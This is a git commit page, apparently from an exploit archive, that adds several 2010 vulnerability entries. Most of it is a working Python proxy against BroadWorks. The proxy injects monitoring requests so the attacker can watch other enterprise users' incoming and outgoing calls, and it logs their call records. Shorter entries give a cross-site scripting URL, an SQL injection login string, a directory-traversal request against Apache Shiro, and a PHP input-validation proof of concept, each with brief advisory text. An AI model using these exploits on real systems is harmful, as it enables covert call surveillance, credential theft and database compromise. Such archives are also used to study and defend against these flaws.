Updated 10_15_2014
This commit is contained in:
parent
68d833b397
commit
d6656d50cd
7 changed files with 327 additions and 0 deletions
|
@ -31468,3 +31468,9 @@ id,file,description,date,author,platform,type,port
|
|||
34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure Vulnerability",2010-11-01,"Francois Harvey",php,webapps,0
|
||||
34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 Directory Traversal Vulnerability",2010-11-01,"John Leitch",multiple,remote,0
|
||||
34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0
|
||||
34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 Cross Site Scripting and SQL Injection Vulnerabilities",2010-10-30,MustLive,php,webapps,0
|
||||
34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 Arbitrary File Upload and Cross Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0
|
||||
34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass Vulnerability",2010-11-02,"Nick Freeman",multiple,remote,0
|
||||
34950,platforms/php/remote/34950.php,"PHP <= 5.3.2 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability",2009-05-11,root@80sec.com,php,remote,0
|
||||
34951,platforms/php/webapps/34951.txt,"Online Work Order Suite Login SQL Injection Vulnerability",2010-11-02,VSN,php,webapps,0
|
||||
34952,platforms/multiple/remote/34952.txt,"Apache Shiro Directory Traversal Vulnerability",2010-11-02,"Luke Taylor",multiple,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/asp/webapps/34948.txt
Executable file
9
platforms/asp/webapps/34948.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/44594/info
|
||||
|
||||
Douran Portal is prone to an arbitrary-file-upload vulnerability and a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit these issues to upload and execute arbitrary ASP code in the context of the webserver process, steal cookie-based authentication information, execute arbitrary client-side scripts in the context of the browser, and obtain sensitive information. Other attacks are also possible.
|
||||
|
||||
Douran Portal versions 3.9.7.55 and prior are vulnerable.
|
||||
|
||||
http://www.example.com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
|
268
platforms/multiple/remote/34949.py
Executable file
268
platforms/multiple/remote/34949.py
Executable file
|
@ -0,0 +1,268 @@
|
|||
source: http://www.securityfocus.com/bid/44597/info
|
||||
|
||||
BroadWorks is prone to a security-bypass vulnerability.
|
||||
|
||||
An attacker can exploit this issue to bypass certain security restrictions and to obtain sensitive information. Successful exploits will enable the attacker to monitor the incoming and outgoing calls of users in other enterprise groups.
|
||||
|
||||
BroadWorks versions R16 and prior are vulnerable.
|
||||
|
||||
#!/usr/env/python
|
||||
# Nick Freeman | vt [ nick.freeman@security-assessment.com ] May 2k10
|
||||
|
||||
# When running the proxy, each request prompts for k, m, i or your input:
|
||||
#
|
||||
# K/Enter - forwards the packet
|
||||
# m - automodifies the packet (see changeme and automod variables)
|
||||
# i - prompts for a file containing usernames in the 098765@sp.com format
|
||||
# input - sends your raw input (i.e., paste an XML message in there)
|
||||
#
|
||||
# When you're auth'd and ready to monitor other users, generate a packet to BroadWorks (address book update for example), select 'i' and specify a file with usernames in it.
|
||||
|
||||
import socket, ssl, sys, re, time
|
||||
from xml.dom import minidom
|
||||
|
||||
|
||||
# define local listening ip, port
|
||||
lhost = '127.0.0.1'
|
||||
lport = 1111
|
||||
|
||||
# define dest host, port, and domain
|
||||
dhost = ''
|
||||
dport = 1111
|
||||
ddomregex = '@serviceprovider\.com.*' # SP's domain name, only regexd
|
||||
|
||||
# define automod
|
||||
changeme = 'CallClient' # the string to automagically change
|
||||
tothis = 'AttendantConsole' # what you want it to automagically change to
|
||||
|
||||
# define injection params
|
||||
userUid = '' # userUid of YOUR user (with AttendantConsole privs)
|
||||
applicationId = 'Client License 4'
|
||||
monitorpacket = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><BroadsoftDocument protocol="CAP" version="14.0"><command commandType="monitoringUsersRequest"><commandData><user
|
||||
userType="AttendantConsole" userUid="' + userUid + '"><applicationId>' + applicationId + '</applicationId><monitoring monType="Add"/>QQQQ</user></commandData></command></BroadsoftDocument>'
|
||||
monUserLine = '<monUser>ZZ</monUser>'
|
||||
|
||||
# define logfile
|
||||
logfile = 'call-logs.txt'
|
||||
|
||||
# the listener
|
||||
ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
ls.bind((lhost, lport))
|
||||
print "+ Bound to port " + `lport`
|
||||
ls.listen(1)
|
||||
print "+ Listening..\n"
|
||||
|
||||
# the sender
|
||||
ds = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sds = ssl.wrap_socket(ds)
|
||||
|
||||
# start listening
|
||||
lconn, addr = ls.accept()
|
||||
print '+ Connected by', addr
|
||||
|
||||
# connect to remote host
|
||||
sds.connect((dhost, dport))
|
||||
print '+ Connected to remote host'
|
||||
|
||||
def local_packetgrab():
|
||||
ldata = ""
|
||||
lconn.settimeout(1)
|
||||
try:
|
||||
ldata = lconn.recv(2048)
|
||||
if len(ldata) < 5:
|
||||
return 'nodata'
|
||||
# debug
|
||||
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>\n"
|
||||
#print "Received data from client:\n"
|
||||
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>\n"
|
||||
#print ldata
|
||||
# We have received some data, lets check if its finished or not
|
||||
while 1:
|
||||
line = ""
|
||||
try:
|
||||
line = lconn.recv(2048)
|
||||
# debug
|
||||
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n"
|
||||
#print "Received more data from client:\n"
|
||||
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n"
|
||||
#print line
|
||||
ldata += line
|
||||
except socket.timeout:
|
||||
# debug
|
||||
#print "No additional data received."
|
||||
break
|
||||
|
||||
# possibly not necessary
|
||||
if line == "":
|
||||
break
|
||||
|
||||
except socket.timeout:
|
||||
# No data received from client
|
||||
return 'nodata'
|
||||
|
||||
if len(ldata) > 5:
|
||||
print ">>>>>>>>>>>>>>>>>\n"
|
||||
print "Data from client:\n"
|
||||
print ">>>>>>>>>>>>>>>>>\n"
|
||||
print ldata
|
||||
return ldata
|
||||
else:
|
||||
# No data received from client
|
||||
return 'nodata'
|
||||
|
||||
|
||||
def remote_packetgrab():
|
||||
ddata = ""
|
||||
sds.settimeout(1)
|
||||
try:
|
||||
ddata = sds.recv(2048)
|
||||
# debug
|
||||
#print "<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
|
||||
#print "Received data from server:\n"
|
||||
#print "<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
|
||||
#print ddata
|
||||
# We have received from data, lets check if its finished or not
|
||||
while 1:
|
||||
dline = ""
|
||||
try:
|
||||
dline = sds.recv(2048)
|
||||
# debug
|
||||
#print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
|
||||
#print "Received more data from server:\n"
|
||||
#print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
|
||||
#print dline
|
||||
ddata += dline
|
||||
except:
|
||||
# debug
|
||||
#print "No additional data received.\n"
|
||||
break
|
||||
|
||||
except:
|
||||
# No data received from server
|
||||
return 'nodata'
|
||||
|
||||
if len(ddata) > 5:
|
||||
print "<<<<<<<<<<<<<<<<<\n"
|
||||
print "Data from server:\n"
|
||||
print "<<<<<<<<<<<<<<<<<\n"
|
||||
print ddata
|
||||
|
||||
# do CDR grab
|
||||
|
||||
if re.search('callUpdate', ddata):
|
||||
logme = open(logfile, 'a')
|
||||
# it be a call packet
|
||||
xmldoc = minidom.parseString(ddata)
|
||||
if re.search('remoteTelUri', ddata):
|
||||
if re.search('\<state\>2', ddata):
|
||||
# it be an incoming call
|
||||
callTo = xmldoc.getElementsByTagName('monitoredUserId')[0].toxml()
|
||||
callTo = re.sub('\<monitoredUserId\>', '', callTo)
|
||||
callTo = re.sub(ddomregex, '', callTo)
|
||||
|
||||
|
||||
callFrom = xmldoc.getElementsByTagName('remoteTelUri')[0].toxml()
|
||||
callFrom = re.sub('\<remoteTelUri\>tel\:', '', callFrom)
|
||||
callFrom = re.sub('\<\/remote.*', '', callFrom)
|
||||
localtime = time.asctime( time.localtime(time.time()) )
|
||||
logstring = "[" + localtime + "]: Incoming call to " + callTo + " from " + callFrom + "!\n"
|
||||
logme.write(logstring)
|
||||
print logstring
|
||||
logme.close()
|
||||
else:
|
||||
if re.search('\<state\>2', ddata):
|
||||
# it be an outgoing call
|
||||
callFrom = xmldoc.getElementsByTagName('monitoredUserId')[0].toxml()
|
||||
callFrom = re.sub('\<monitoredUserId\>', '', callFrom)
|
||||
callFrom = re.sub(ddomregex, '', callFrom)
|
||||
|
||||
|
||||
callTo = xmldoc.getElementsByTagName('remoteNumber')[0].toxml()
|
||||
callTo = re.sub('\<remoteNumber\>', '', callTo)
|
||||
callTo = re.sub('\<\/remote.*', '', callTo)
|
||||
|
||||
localtime = time.asctime( time.localtime(time.time()) )
|
||||
logstring = "[" + localtime + "]: Outgoing call from " + callFrom + " to " + callTo + "!\n"
|
||||
logme.write(logstring)
|
||||
print logstring
|
||||
logme.close()
|
||||
|
||||
|
||||
return ddata
|
||||
else:
|
||||
# No data received from server
|
||||
return 'nodata'
|
||||
|
||||
|
||||
def packet_handle(packet):
|
||||
user_input = raw_input("ACTION: 'k', 'm', 'i' or your input:\n-------------------------------\n")
|
||||
if user_input == 'k' or user_input == '':
|
||||
print "Sending request as is..\n"
|
||||
print "-----------------------\n"
|
||||
return packet
|
||||
elif user_input == 'm':
|
||||
print "Sending auto-modded request..\n"
|
||||
print "-----------------------------\n"
|
||||
packet = re.sub(changeme, tothis, packet)
|
||||
return packet
|
||||
elif user_input == "i":
|
||||
filename = raw_input("Input file containing usernames:\n--------------------------------\n");
|
||||
try:
|
||||
file = open(filename, 'r')
|
||||
except:
|
||||
filename = raw_input("File does not exist. Try again:\n-------------------------------\n")
|
||||
file_line = 0
|
||||
|
||||
injection_input = ''
|
||||
for each_line in file:
|
||||
print "Read line: " + each_line
|
||||
mond_user = re.sub('ZZ', each_line, monUserLine)
|
||||
injection_input = injection_input + mond_user
|
||||
file_line = file_line + 1
|
||||
if file_line >= 100:
|
||||
evilpacket = re.sub('QQQQ', injection_input, monitorpacket)
|
||||
print "Sending injection packet.."
|
||||
print "--------------------------\n"
|
||||
evilpacket = re.sub('\n', '', evilpacket)
|
||||
print evilpacket
|
||||
sds.send(evilpacket)
|
||||
file_line = 0
|
||||
|
||||
|
||||
# we have now got 100 users to add. send the packet, then continue sorting through users.
|
||||
if len(injection_input) > 10:
|
||||
evilpacket = re.sub('QQQQ', injection_input, monitorpacket)
|
||||
print "Sending injection packet.."
|
||||
print "--------------------------\n"
|
||||
evilpacket = re.sub('\n', '', evilpacket)
|
||||
print evilpacket
|
||||
sds.send(evilpacket)
|
||||
|
||||
# after all injection is done, return initial packet
|
||||
file.close()
|
||||
return packet
|
||||
|
||||
else:
|
||||
print "Sending modified packet..\n"
|
||||
print "-------------------------\n"
|
||||
return user_input
|
||||
|
||||
|
||||
|
||||
|
||||
while 1:
|
||||
# Debug
|
||||
#print "Checking for client packet..\n"
|
||||
print ">"
|
||||
local_data = local_packetgrab()
|
||||
if local_data != 'nodata' and len(local_data) > 5:
|
||||
lpacket_tosend = packet_handle(local_data)
|
||||
sds.send(lpacket_tosend)
|
||||
|
||||
# Debug
|
||||
#print "Checking for server packet..\n"
|
||||
print "<"
|
||||
remote_data = remote_packetgrab()
|
||||
if remote_data != 'nodata' and len(remote_data) > 5:
|
||||
rpacket_tosend = packet_handle(remote_data)
|
||||
lconn.send(rpacket_tosend)
|
9
platforms/multiple/remote/34952.txt
Executable file
9
platforms/multiple/remote/34952.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/44616/info
|
||||
|
||||
Apache Shiro is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
|
||||
|
||||
Apache Shiro 1.0.0 is vulnerable; other versions may be affected.
|
||||
|
||||
GET /./account/index.jsp HTTP/1.1
|
15
platforms/php/remote/34950.php
Executable file
15
platforms/php/remote/34950.php
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/44605/info
|
||||
|
||||
PHP is prone to a vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue can allow attackers to provide unexpected input and possibly bypass input-validation protection mechanisms. This can aid in further attacks that may utilize crafted user-supplied input.
|
||||
|
||||
Versions prior to PHP 5.3.4 are vulnerable.
|
||||
|
||||
<?php
|
||||
$ill=chr(0xf0).chr(0xc0).chr(0xc0).chr(0xa7);
|
||||
$ill=addslashes($ill);
|
||||
echo utf8_decode("$ill");
|
||||
echo htmlspecialchars ($ill,ENT_QUOTES,"utf-8" );
|
||||
?>
|
||||
|
9
platforms/php/webapps/34947.txt
Executable file
9
platforms/php/webapps/34947.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/44591/info
|
||||
|
||||
CMS WebManager-Pro is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
CMS WebManager-Pro 7.4.3 is vulnerable; other verisons may also be affected.
|
||||
|
||||
http://www.example.com/index.php?word[]={XSS}
|
11
platforms/php/webapps/34951.txt
Executable file
11
platforms/php/webapps/34951.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/44608/info
|
||||
|
||||
Online Work Order Suite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Online Work Order Suite 2.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following example data is available:
|
||||
|
||||
' or 1=1 or ''=''
|
Loading…
Add table
Reference in a new issue